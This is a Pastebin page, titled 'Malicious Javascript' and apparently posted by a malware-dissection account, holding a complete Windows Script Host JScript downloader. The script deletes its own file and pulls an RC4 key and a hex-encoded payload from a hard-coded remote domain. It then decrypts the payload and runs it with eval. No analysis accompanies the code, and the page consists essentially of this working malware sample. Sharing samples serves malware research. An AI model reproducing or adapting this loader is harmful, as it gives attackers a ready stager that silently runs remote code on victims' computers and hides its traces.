Advertisement
dissectmalware

Malicious Javascript

Dec 25th, 2018
623
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. var domurl = "gae3emightymagoo.com";
  2. addr1 = "https://"+domurl+"/"+(new Date()).getTime()+".flv";
  3.  addr = "https://"+domurl+"/"+(new Date()).getTime()+".mp4";
  4.  
  5.  
  6. a = new ActiveXObject('WScript.Shell');
  7.  
  8. m = new ActiveXObject("MSXML2.XMLHTTP");
  9.  
  10. f = new ActiveXObject("Scripting.FileSystemObject");
  11.  
  12. try{
  13. c=WScript.ScriptFullName;
  14. if(f.FileExists(c))f.DeleteFile(c);
  15. }
  16. catch(e){}
  17.  
  18. for(var i=1;i<=5;i++){
  19. try{
  20. m.open("GET", addr1+"?t="+(new Date()).getTime(), false);
  21. m.send(null);
  22. break;}
  23. catch(e)
  24. {
  25. WScript.Sleep(5000);
  26. }
  27. }
  28.  
  29. key=m.ResponseText.substring(3);
  30. id=m.ResponseText.substring(0,3);
  31.  
  32. for(var i=1;i<=5;i++)
  33. {
  34. try{
  35. m.open("GET", addr+"?t="+(new Date()).getTime(), false);
  36. m.send(null);
  37. break;
  38. }
  39. catch(e)
  40. {
  41. WScript.Sleep(5000);
  42. }
  43. }
  44. encoded=m.ResponseText;
  45.  
  46. crypted="";
  47.  
  48. for(i=0;i<encoded.length;i+=2)
  49.     crypted+=String.fromCharCode(parseInt(encoded.substr(i,2),16));
  50.  
  51. cyphered=crypted;
  52.  
  53. var rc4table = [], counter2 = 0, tmp, decrypted = "";
  54.  
  55. for (var counter = 0; counter < 256; counter++)
  56. {rc4table[counter] = counter;}
  57.  
  58. for (counter = 0; counter < 256; counter++)
  59.  {
  60.  counter2 = (counter2 + rc4table[counter] + key.charCodeAt(counter % key.length)) % 256;
  61.  tmp = rc4table[counter];
  62.  rc4table[counter] = rc4table[counter2];
  63.  rc4table[counter2] = tmp;
  64.  }
  65.  
  66.  counter = 0;
  67.  counter2 = 0;
  68.  
  69.  for (var counter3 = 0; counter3 < cyphered.length; counter3++)
  70.  {
  71.  counter = (counter + 1) % 256;counter2 = (counter2 + rc4table[counter]) % 256;tmp = rc4table[counter];
  72.  rc4table[counter] = rc4table[counter2];rc4table[counter2] = tmp;
  73.  decrypted += String.fromCharCode(cyphered.charCodeAt(counter3) ^ rc4table[(rc4table[counter] + rc4table[counter2]) % 256]);
  74.  }
  75.  
  76. eval(decrypted);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement